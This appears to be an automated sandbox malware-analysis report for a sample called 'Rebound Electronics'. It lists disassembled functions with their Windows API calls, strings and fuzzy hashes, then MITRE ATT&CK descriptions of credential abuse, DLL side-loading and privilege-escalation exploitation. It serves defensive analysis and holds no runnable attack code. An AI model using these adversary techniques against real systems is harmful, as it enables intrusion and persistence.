Instruction Fuzzy Hash: A1316A71C00119EBCF11EFA1DC81AEE7FB8FF14710F104015F915A6166EB71AA06DBA0

Function 00C8975A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00C8980E
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00C8984A

Strings

static, xrefs: 00C897AA

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: a63e407950997838d10091104d5077ae3c136f740715fede6ec28baab02abcf2
Instruction ID: 65f751f59b218b0c39fa316cd685c96895cc90f65aa17ec56cd88b8286170581
Opcode Fuzzy Hash: a63e407950997838d10091104d5077ae3c136f740715fede6ec28baab02abcf2
Instruction Fuzzy Hash: 84318D71110605AEEB11AF74CC80BFB73B9FF99768F048619F9AAC7190CA31AD81D764

Function 00C65157 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C651C6
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00C65201

Strings

0, xrefs: 00C651BF

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 46e8ab8900df4039e10ed2184c95612decf974618939ea085fb7db4339377a6b
Instruction ID: 5f885dedfb3278b02d996dc21826b6b7cb743ebb27369f8ce5c86e940b945f7b
Opcode Fuzzy Hash: 46e8ab8900df4039e10ed2184c95612decf974618939ea085fb7db4339377a6b
Instruction Fuzzy Hash: 5831E471A007049BEB34CF99D8D5BAEBBF4FF45350F344029E9A5A61A0E7709B44DB10

Function 00C7658B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 00C76608

Strings

AUTOITCALLVARIABLE%d, xrefs: 00C765FA
, $, xrefs: 00C76648

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: __snwprintf
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 2391506597-2584243854
Opcode ID: 7aebbc3c43aca49200de53be4afdcba2b33766d4f9ea03583dc27cff13d57f50
Instruction ID: 7188c0d5d012149d1f94780dd5c0e429fac8318541fa5f1a81772ba62dba7c9d
Opcode Fuzzy Hash: 7aebbc3c43aca49200de53be4afdcba2b33766d4f9ea03583dc27cff13d57f50
Instruction Fuzzy Hash: 8E21B471A00528AFCF14EF64D882EEE77B4AF44740F404469F505AB282DB70EE55DBA5

Function 00C893CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00C8945C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C89467

Strings

Combobox, xrefs: 00C89429

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 2db8433f341770ef270675608c1dc3c6d7e6cf0424c8fe1e04200416461f67c4
Instruction ID: 868768cda640b43df0ae3707904765ea9a1aabfa17471125ca8b308c44fa8da6
Opcode Fuzzy Hash: 2db8433f341770ef270675608c1dc3c6d7e6cf0424c8fe1e04200416461f67c4
Instruction Fuzzy Hash: AB11B2713102097FEF11AE54DC80FBF376EEB893A8F140125F929972A0D6319D529B64

Function 00C898FE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00C3D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00C3D1BA
Part of subcall function 00C3D17C: GetStockObject.GDI32(00000011), ref: 00C3D1CE
Part of subcall function 00C3D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C3D1D8

GetWindowRect.USER32(00000000,?), ref: 00C89968
GetSysColor.USER32(00000012), ref: 00C89982

Strings

static, xrefs: 00C89945

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 613b7614b334ac16aaddeecea0c3b63889ab46ecc05ae876af0e01fc9d0d09e0
Instruction ID: 8931ba8b86465359b1185a53bdca9fc9603aec68295e6e28a763081daa4040cf
Opcode Fuzzy Hash: 613b7614b334ac16aaddeecea0c3b63889ab46ecc05ae876af0e01fc9d0d09e0
Instruction Fuzzy Hash: 99112972520209AFDB04EFB8CC45AFE7BA8FB08358F054629F956E3250D734E850DB54

Function 00C89617 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00C89699
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00C896A8

Strings

edit, xrefs: 00C8967D

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 660cdf3c332f6f92226e1bf8c395ff85b2f42b445bc776ea6f51bd2e2fc47e62
Instruction ID: 155a1553fff646a0e6129594841d0414004cfac609ca75ad1f401f389ced7322
Opcode Fuzzy Hash: 660cdf3c332f6f92226e1bf8c395ff85b2f42b445bc776ea6f51bd2e2fc47e62
Instruction Fuzzy Hash: 23116A71510108ABEB516FA4DC80BFB3B6AEB0537CF184714F976971E0E7319C50A768

Function 00C65262 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C652D5
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00C652F4

Strings

0, xrefs: 00C652CE

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 2848f123a077dcb0a40521372328eee77ee379af285b443af7603a704e61e0df
Instruction ID: b442890d5ee861848a9fc0a2c95177e7da5188dcb4f8544bf450c2ecfa8343f5
Opcode Fuzzy Hash: 2848f123a077dcb0a40521372328eee77ee379af285b443af7603a704e61e0df
Instruction Fuzzy Hash: EA11B276D01A14ABDB30DF98D984B9D77B8AB05B54F290025E962E72A0D3B0EE44C791

Function 00C74D9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00C74DF5
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00C74E1E

Strings

<local>, xrefs: 00C74DE6

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 2a8080a2c06c1e16dff8837f8ba9c8c511cd94570583b0d8149696131a3dd9ef
Instruction ID: b4b6e3875aec616e51aae06ac249979acafb8d044a69aa9feb0de7a2d63d39fb
Opcode Fuzzy Hash: 2a8080a2c06c1e16dff8837f8ba9c8c511cd94570583b0d8149696131a3dd9ef
Instruction Fuzzy Hash: 94117070501621BBDB398F52C889FFBFAA8FF26765F10C22AF56A96540D3705A40C6E0

Function 00C7A82C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON

Download Yara Rule

APIs

inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00C7A84E
htons.WSOCK32(00000000,?,00000000), ref: 00C7A88B

Strings

255.255.255.255, xrefs: 00C7A866

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: htonsinet_addr
String ID: 255.255.255.255
API String ID: 3832099526-2422070025
Opcode ID: 1fc7f055f27fa6b8c53fa5310216d2c17bb2a0eb6ffcf549269c6c21e9bae626
Instruction ID: 0fa87b29902d45ca62befde83ef31ca397c165e34b5f6d17c28f1a8a651212e2
Opcode Fuzzy Hash: 1fc7f055f27fa6b8c53fa5310216d2c17bb2a0eb6ffcf549269c6c21e9bae626
Instruction Fuzzy Hash: B001D275200305ABCB21AFA8D886FADB764EF85314F10C426F52A9B3D1D771E8059757

Function 00C5B781 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00C5B7EF

Strings

ListBox, xrefs: 00C5B7B9
ComboBox, xrefs: 00C5B78B

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: 3d31f1f49cb04bec1b1e692dc37414aea51c2f0ca4a9f23fb4777ff0abe1dd40
Instruction ID: 868d71fe47e02012deb25fe1af524204008bf08d9f9e90ed82599801122e49cb
Opcode Fuzzy Hash: 3d31f1f49cb04bec1b1e692dc37414aea51c2f0ca4a9f23fb4777ff0abe1dd40
Instruction Fuzzy Hash: 8901D475640228ABCB04EBA4DC92DFE3369BF56350B04061DF872A72D2EB705D4CE7A4

Function 00C5B67D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000180,00000000,?), ref: 00C5B6EB

Strings

ListBox, xrefs: 00C5B6B5
ComboBox, xrefs: 00C5B687

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: 980b87d2d1f30b5b3f8348666bafb1cd911d4c21cf4fbbbc228fd4df9bf1898d
Instruction ID: 47b96899b465dc1d6dff3f5e3a12698699382c3fb2c3efb88001fba1f4a5f9da
Opcode Fuzzy Hash: 980b87d2d1f30b5b3f8348666bafb1cd911d4c21cf4fbbbc228fd4df9bf1898d
Instruction Fuzzy Hash: 6301F2B9640104ABCB08EBA4D952FFF33A89F15301F100029B903B3281EF905F0CA7B9

Function 00C5B700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000182,?,00000000), ref: 00C5B76C

Strings

ListBox, xrefs: 00C5B738
ComboBox, xrefs: 00C5B70A

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: e2a3d283dc2823748b2670b4afa6e3b57703fd816941e541944036a438e21784
Instruction ID: 07bcff8c606fcfe4f5f5f811a1e5d495f975853d6848c936cdfe563ca41c6b0e
Opcode Fuzzy Hash: e2a3d283dc2823748b2670b4afa6e3b57703fd816941e541944036a438e21784
Instruction Fuzzy Hash: C801D6B9640114BBDB00EBA4D942FFE73AC9F19345F500029B803B3692EB605F4DA7B9

Function 00C67744 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00C67762
_wcscmp.LIBCMT ref: 00C67774

Strings

#32770, xrefs: 00C6776E

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: ca7ae01942030bab35ff4fd03ca4962d24507227b320c5d6da557734e866e585
Instruction ID: 404e8ddc06b6fe180600aab9dc921e41d71a112c85d8d6a0eddcd85a02cd559f
Opcode Fuzzy Hash: ca7ae01942030bab35ff4fd03ca4962d24507227b320c5d6da557734e866e585
Instruction Fuzzy Hash: 0FE0927760436467D720ABA59C49FCBFBACAB51764F000166B915D3181E660E64187D0

Function 00C5A631 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00C5A63F

Part of subcall function 00C413F1: _doexit.LIBCMT ref: 00C413FB

Strings

Error allocating memory., xrefs: 00C5A638
AutoIt, xrefs: 00C5A633

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: 1ed7985dfa034ab0b081d496c12389494bcab5448bbd4820e13b84ff9e0e4089
Instruction ID: 0e4c9fb41220af6fe38d5ffd46768d7701f777131dbbe84d94bfd4f7c9ea0124
Opcode Fuzzy Hash: 1ed7985dfa034ab0b081d496c12389494bcab5448bbd4820e13b84ff9e0e4089
Instruction Fuzzy Hash: 59D05B313C432833D21536D97C17FC975489B15B55F080436BF0D965D25DE6DA8051DD

Function 00C9AE86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 00C9ACC0
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00C9AEBD

Strings

WIN_XPe, xrefs: 00C9ACD3

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: DirectoryFreeLibrarySystem
String ID: WIN_XPe
API String ID: 510247158-3257408948
Opcode ID: b827673c68233d8286c21de34b0803c0e93778361ccc162da3613aeb8946f555
Instruction ID: 6173efe38dd425305a2cca580c965cd1ca5e7c71683be7f94e9d3eb1b722b5e8
Opcode Fuzzy Hash: b827673c68233d8286c21de34b0803c0e93778361ccc162da3613aeb8946f555
Instruction Fuzzy Hash: 73E06D70C00209EFCF11DBA9D988BECBBB8AB58300F108081E113B6560CB314A84DF22

Function 00C886CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C886E2
PostMessageW.USER32(00000000), ref: 00C886E9

Part of subcall function 00C67A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00C67AD0

Strings

Shell_TrayWnd, xrefs: 00C886DB

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: b17d7716f24123de21cb47310dcbfd50e1231202597341944fd6462204383b88
Instruction ID: 5214ec54509e1d15bed36f9a886b9be47af3431c1596dec3ae9eb03d0253d7fb
Opcode Fuzzy Hash: b17d7716f24123de21cb47310dcbfd50e1231202597341944fd6462204383b88
Instruction Fuzzy Hash: 56D012717853547BF2786770AC4BFCA7A189B05B15F100D16B747EB1D1C9E0E940C755

Function 00C88698 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C886A2
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00C886B5

Part of subcall function 00C67A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00C67AD0

Strings

Shell_TrayWnd, xrefs: 00C8869B

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: ee50912ba56d2419a22cb04ef3724878fdcc81fb4764e54d840b5f7f21ecdd74
Instruction ID: 81b0d8dfd5230cc1020b39897f91b3cf79ba6891032ffb903b22e44cf1506ab5
Opcode Fuzzy Hash: ee50912ba56d2419a22cb04ef3724878fdcc81fb4764e54d840b5f7f21ecdd74
Instruction Fuzzy Hash: F8D01271798354B7F2786770AC4BFCA7A189B05B15F100D16B74BAB1D1C9E0E940C754

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

